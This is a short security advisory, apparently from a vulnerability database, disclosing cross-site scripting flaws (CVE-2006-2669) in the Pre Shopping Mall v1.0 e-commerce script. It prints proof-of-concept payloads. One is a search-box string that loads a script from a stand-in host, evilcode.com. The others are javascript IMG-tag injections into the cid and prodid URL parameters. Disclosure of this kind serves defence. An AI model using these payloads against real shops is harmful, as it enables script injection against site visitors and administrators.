Pre Shopping Mall v1.0

2006-05-30 / 2006-05-31
Credit: luny youfucktard com
Risk: Low
Local: No
Remote: Yes
CVE: CVE-2006-2669
CWE: CWE-79


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

Pre Shopping Mall Homepage: http://www.preprojects.com/emall.asp Description: PRE SHOPPING MALL a power full ecommerce shopping mall solution. If you need to setup a online shop or shopping mall PRE SHOPPING MALL is your quickest solution. You can setup your Emall within few hours. Buy install and start selling your products. Very easy to installs and manage powerful administration. Receive payments either through Paypal or Authorize.net. Quickest solution for your online business. Effected files: search box. detail.php products.php Exploits & Vulns: XSS Vulnerabilities: The search and login box does not sanatize user input before generating it dynamically. This could cause XSS. For proof of concept just try putting this in the search box: '';!--"<XSS>=&{()}'';!--"<XSS>=&{()}<SCRIPT SRC=http://www.evilcode.com/xss.js></SCRIPT>'';!--"<XSS>=&{()}'';!--" <XSS>=&{()} More XSS Vulns: For the XSS examples we'll use url injection with the tag: <IMG%20SRC=javascript:alert('XSS')> http://www.example.com/emall/products.php?cid=[XSS] http://www.example.com/emall/detail.php?prodid=[XSS]


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top